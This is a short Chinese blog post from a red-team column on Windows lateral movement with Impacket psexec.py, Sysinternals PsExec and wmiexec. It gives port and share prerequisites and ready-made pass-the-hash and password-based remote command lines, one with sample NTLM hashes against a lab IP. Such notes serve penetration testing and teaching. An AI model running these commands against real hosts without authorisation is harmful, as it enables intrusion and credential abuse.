psexec/PsExec/wmiexec

Adsatrtgo

已于 2022-07-09 14:03:08 修改

阅读量497

点赞数

分类专栏：红蓝对抗-攻防安全文章标签： p2p 网络协议网络

于 2021-07-26 12:57:14 首次发布

本文链接：https://blog.csdn.net/qq_38376348/article/details/119106778

版权

红蓝对抗-攻防安全专栏收录该内容

48 篇文章 54 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

psexec/PsExec

psexec依赖于对方开启admin$共享或 c$ (该共享默认开启，依赖于445端口)

python版本

可以使用哈希或者用户名密码(格式域名或者工作组名/用户名)进行连接

python psexec.py -hashes LMhash(替换成实际的哈希):NTLMhash(替换成实际的哈希) start/yonghuming@10.211.55.6
psexec.py hacktest/administrator@10.211.55.3 -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC
python psexec.py start/yonghuming:password@10.211.55.6
python psexec.py administrator@10.211.55.3 （交互式输入密码）

需要445端口

exe版本，Pstool

PsExec.exe \\127.0.0.1 -u start\username -p pass cmd

wmiexec

局限于sid为500的用户,135端口

了解本专栏

超级会员免费看

Adsatrtgo

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
psexec/PsExec/wmiexec

依赖于对方开启admin$共享或c$ (该共享默认开启，依赖于445端口)python版本python psexec.py -hashes LMhash:NTLMhash start/yonghuming@10.211.55.6python psexec.py start/yonghuming:password@10.211.55.6exe版本，PstoolPsExec.exe \\127.0.0.1 -u start\username -p pass cmd相关文..
复制链接

扫一扫

专栏目录